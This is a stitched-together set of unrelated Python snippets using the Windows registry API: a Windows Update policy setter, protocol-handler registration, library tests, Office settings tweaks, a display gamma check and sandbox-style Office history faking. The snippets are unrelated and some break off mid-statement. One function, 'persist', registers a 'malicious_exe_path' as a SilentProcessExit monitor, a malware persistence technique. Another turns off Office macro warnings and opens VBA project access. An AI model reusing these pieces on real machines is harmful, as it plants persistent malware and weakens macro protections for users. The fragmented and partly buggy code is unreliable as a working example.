def set_setting(s): try: try: DeleteKeyEx(HKEY_LOCAL_MACHINE, AU, KEY_ALL_ACCESS, 0) except FileNotFoundError: pass try: DeleteKeyEx(HKEY_LOCAL_MACHINE, WindowsUpdate, KEY_ALL_ACCESS, 0) except FileNotFoundError: pass CreateKeyEx(HKEY_LOCAL_MACHINE, WindowsUpdate, 0, KEY_ALL_ACCESS) CreateKeyEx(HKEY_LOCAL_MACHINE, AU, 0, KEY_ALL_ACCESS) with OpenKey(HKEY_LOCAL_MACHINE, AU, 0, KEY_ALL_ACCESS) as key: if s == 1: SetValueEx(key, NoAutoUpdate, 0, REG_DWORD, 1) elif s != 0: SetValueEx(key, NoAutoUpdate, 0, REG_DWORD, 0) SetValueEx(key, AUOptions, 0, REG_DWORD, s) SetValueEx(key, ScheduledInstallDay, 0, REG_DWORD, 6) SetValueEx(key, ScheduledInstallTime, 0, REG_DWORD, 3) except PermissionError: print('Permission denied. Please run this program as Administrator.') else: print('Windows Update settings changed successfully.')
def registration(): import os print(sys.executable) if os.path.basename(sys.executable) == "__main__.exe": try: from winreg import ConnectRegistry, HKEY_CLASSES_ROOT, \ CreateKeyEx, SetValueEx, REG_SZ, KEY_ALL_ACCESS, KEY_SET_VALUE root = ConnectRegistry(None, HKEY_CLASSES_ROOT) policy_key = CreateKeyEx(root, r"rhythmcollective", 0, KEY_SET_VALUE) SetValueEx(policy_key, None, 0, REG_SZ, "URL:rhythmcollective") SetValueEx(policy_key, "URL Protocol", 0, REG_SZ, "") policy_key = CreateKeyEx(root, r"rhythmcollective\DefaultIcon", 0, KEY_SET_VALUE) SetValueEx(policy_key, None, 0, REG_SZ, "\"Arena.exe,1\"") policy_key = CreateKeyEx(root, r"rhythmcollective\shell\open\command", 0, KEY_ALL_ACCESS) SetValueEx(policy_key, None, 0, REG_SZ, f"\"{sys.executable}\" --from-url \"%1\"") print("registered") except OSError as an_error: print(f"unable to open registry {an_error}")
def test_CreateKeyEx(self): from winreg import CreateKeyEx, QueryInfoKey from winreg import KEY_ALL_ACCESS, KEY_READ key = CreateKeyEx(self.root_key, self.test_key_name, 0, KEY_ALL_ACCESS) sub_key = CreateKeyEx(key, "sub_key", 0, KEY_READ) nkeys, nvalues, since_mod = QueryInfoKey(key) assert nkeys == 1 nkeys, nvalues, since_mod = QueryInfoKey(sub_key) assert nkeys == 0
def set_keys(self): baseOfficeKeyPath = r"Software\Microsoft\Office" installedVersions = list() try: officeKey = OpenKey(HKEY_CURRENT_USER, baseOfficeKeyPath, 0, KEY_READ) for currentKey in range(0, QueryInfoKey(officeKey)[0]): isVersion = True officeVersion = EnumKey(officeKey, currentKey) if "." in officeVersion: for intCheck in officeVersion.split("."): if not intCheck.isdigit(): isVersion = False break if isVersion: installedVersions.append(officeVersion) CloseKey(officeKey) except WindowsError: # Office isn't installed at all return for oVersion in installedVersions: key = CreateKeyEx( HKEY_CURRENT_USER, r"{0}\{1}\Publisher\Security".format(baseOfficeKeyPath, oVersion), 0, KEY_SET_VALUE) SetValueEx(key, "VBAWarnings", 0, REG_DWORD, 1) SetValueEx(key, "AccessVBOM", 0, REG_DWORD, 1) SetValueEx(key, "ExtensionHardening", 0, REG_DWORD, 0) CloseKey(key)
def maybe_set_key(key_path: str, expected: str, dry_run: bool = False, var_name: str = None): from winreg import HKEY_CLASSES_ROOT, OpenKey, QueryValue, CreateKeyEx, SetValue, REG_SZ, KEY_WRITE, KEY_READ from winreg import QueryValueEx, SetValueEx try: with OpenKey(HKEY_CLASSES_ROOT, key_path, 0, KEY_READ) as entry_key: if var_name: value = QueryValueEx(entry_key, var_name)[0] else: value = QueryValue(entry_key, None) except FileNotFoundError: value = None if value != expected: prefix = '[DRY RUN] Would set' if dry_run else 'Setting' if var_name: log.info(f'{prefix} HKEY_CLASSES_ROOT\\{key_path}[{var_name!r}] = {expected!r}') else: log.info(f'{prefix} HKEY_CLASSES_ROOT\\{key_path} = {expected!r}') if not dry_run: with CreateKeyEx(HKEY_CLASSES_ROOT, key_path, 0, KEY_WRITE) as entry_key: if var_name: SetValueEx(entry_key, var_name, 0, REG_SZ, expected) else: SetValue(entry_key, None, REG_SZ, expected) # noqa else: log.info(f'Already contains expected value: HKEY_CLASSES_ROOT\\{key_path}')
def persist(malicious_exe_path: str, target_exe: str, target_reg_keys: list): with ConnectRegistry(None, HKEY_LOCAL_MACHINE) as hklm: # create the `Image File Execution Options` subkey with target executable CreateKeyEx(hklm, target_reg_keys[0], 0, KEY_WRITE) # create the `SilentProcessExit` subkey with target executable CreateKeyEx(hklm, target_reg_keys[1], 0, KEY_WRITE) for reg_key in target_reg_keys: with OpenKey(hklm, reg_key, 0, KEY_ALL_ACCESS) as target_key: for _ in range(QueryInfoKey(target_key)[0]): if "Image File Exection" in reg_key: SetValueEx(hklm, "GlobalFlag", 0, REG_DWORD, 512) else: SetValueEx(hklm, "ReportingMode", 0, REG_DWORD, 1) SetValueEx(hklm, "MonitorProcess", 0, REG_SZ, malicious_exe_path) flush_registry_changes()
def test_named_arguments(self): from winreg import KEY_ALL_ACCESS, CreateKeyEx, DeleteKey, OpenKeyEx with CreateKeyEx(key=self.root_key, sub_key=self.test_key_name, reserved=0, access=KEY_ALL_ACCESS) as ckey: assert ckey.handle != 0 with OpenKeyEx(key=self.root_key, sub_key=self.test_key_name, reserved=0, access=KEY_ALL_ACCESS) as okey: assert okey.handle != 0 DeleteKey(self.root_key, self.test_key_name)
def create_key( self, name: str, key_wow64_32key: bool = False, ) -> None: handler = None sub_keys = name.split("\\") i = 0 while i < len(sub_keys) and not handler: try: current = "\\".join(sub_keys[:len(sub_keys) - i]) handler = self._get_handler(current, KEY_WRITE, key_wow64_32key) except FileNotFoundError: i += 1 before_index = len(sub_keys) - i tail = "\\".join(sub_keys[before_index:]) CreateKeyEx( key=handler, # type: ignore sub_key=tail, reserved=0, access=get_access_key(KEY_WRITE), )
def checkCreateKeys(): CreateKeyEx(HKEY_CURRENT_USER,"OSMANI") Key = OpenKey(HKEY_CURRENT_USER,"OSMANI") try: QueryValueEx(Key, "timerInterval") except: from subprocess import call call(["C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", """ New-ItemProperty -Path HKCU:\OSMANI\ -Name "timerInterval" -PropertyType "String" -Value '18000' """]) try: QueryValueEx(Key, "path") except: from subprocess import call call(["C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", """ New-ItemProperty -Path HKCU:\OSMANI\ -Name "path" -PropertyType "String" -Value 'C:\' """]) try: QueryValueEx(Key, "LAN_DB_SERVER ") except: from subprocess import call call(["C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", """ New-ItemProperty -Path HKCU:\OSMANI\ -Name "LAN_DB_SERVER" -PropertyType "String" -Value 'http://172.16.0.7:8080/0033-OCL-2020-WS/linker.php?' """]) try: QueryValueEx(Key, "INTERNET_DB_SERVER ") except: from subprocess import call call(["C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", """ New-ItemProperty -Path HKCU:\OSMANI\ -Name "INTERNET_DB_SERVER " -PropertyType "String" -Value 'http://portal.osmani.com:8049/0033-OCL-2020-WS/linker.php?' """])
def test_gamma_ramp(): set_gamma_ramp(device, gamma, 0.0, remap) set_gamma_ramp(device, gamma, 1.0, remap) try: test_gamma_ramp() except Exception as e: icm = r'SOFTWARE\Microsoft\Windows NT\CurrentVersion\ICM' try: key = None try: key = OpenKey(HKEY_LOCAL_MACHINE, icm, access=KEY_READ) except FileNotFoundError: key = CreateKeyEx(HKEY_LOCAL_MACHINE, icm, access=KEY_READ) try: gamma_range = QueryValueEx(key, 'GdiIcmGammaRange')[0] except FileNotFoundError: gamma_range = None finally: if key is not None: CloseKey(key) if gamma_range == 256: print('Error: Device does not support the full gamma range! ' '(or you haven\'t rebooted yet)') sys.exit() restore_gamma_ramp = os.path.join(application_path,
def set_office_mrus(self): """Adds randomized MRU's to Office software(s). Occasionally used by macros to detect sandbox environments. """ baseOfficeKeyPath = r"Software\Microsoft\Office" installedVersions = [] basePaths = [ "C:\\", "C:\\Windows\\Logs\\", "C:\\Windows\\Temp\\", "C:\\Program Files\\", ] extensions = { "Word": ["doc", "docx", "docm", "rtf"], "Excel": ["xls", "xlsx", "csv"], "PowerPoint": ["ppt", "pptx"], } try: with OpenKey(HKEY_CURRENT_USER, baseOfficeKeyPath, 0, KEY_READ) as officeKey: for currentKey in range(QueryInfoKey(officeKey)[0]): officeVersion = EnumKey(officeKey, currentKey) if "." in officeVersion: isVersion = all( intCheck.isdigit() for intCheck in officeVersion.split(".")) if isVersion: installedVersions.append(officeVersion) except WindowsError: # Office isn't installed at all return for oVersion, software in itertools.product(installedVersions, extensions): values = [] mruKeyPath = "" productPath = rf"{baseOfficeKeyPath}\{oVersion}\{software}" try: with OpenKey(HKEY_CURRENT_USER, productPath, 0, KEY_READ): pass mruKeyPath = rf"{productPath}\File MRU" with CreateKeyEx(HKEY_CURRENT_USER, mruKeyPath, 0, KEY_READ) as mruKey: displayValue = False for mruKeyInfo in range(QueryInfoKey(mruKey)[1]): currentValue = EnumValue(mruKey, mruKeyInfo) if currentValue[0] == "Max Display": displayValue = True values.append(currentValue) except WindowsError: # An Office version was found in the registry but the # software (Word/Excel/PowerPoint) was not installed. values = "notinstalled" if values != "notinstalled" and len(values) < 5: with OpenKey(HKEY_CURRENT_USER, mruKeyPath, 0, KEY_SET_VALUE) as mruKey: if not displayValue: SetValueEx(mruKey, "Max Display", 0, REG_DWORD, 25) for i in range(1, randint(10, 30)): rString = random_string(minimum=11, charset="0123456789ABCDEF") baseId = f"T01D1C{rString}" if i % 2 else f"T01D1D{rString}" setVal = "[F00000000][{0}][O00000000]*{1}{2}.{3}".format( baseId, basePaths[randint(0, len(basePaths) - 1)], random_string( minimum=3, maximum=15, charset="abcdefghijkLMNOPQURSTUVwxyz_0369"), extensions[software][randint( 0, len(extensions[software]) - 1)], ) name = f"Item {i}" SetValueEx(mruKey, name, 0, REG_SZ, setVal)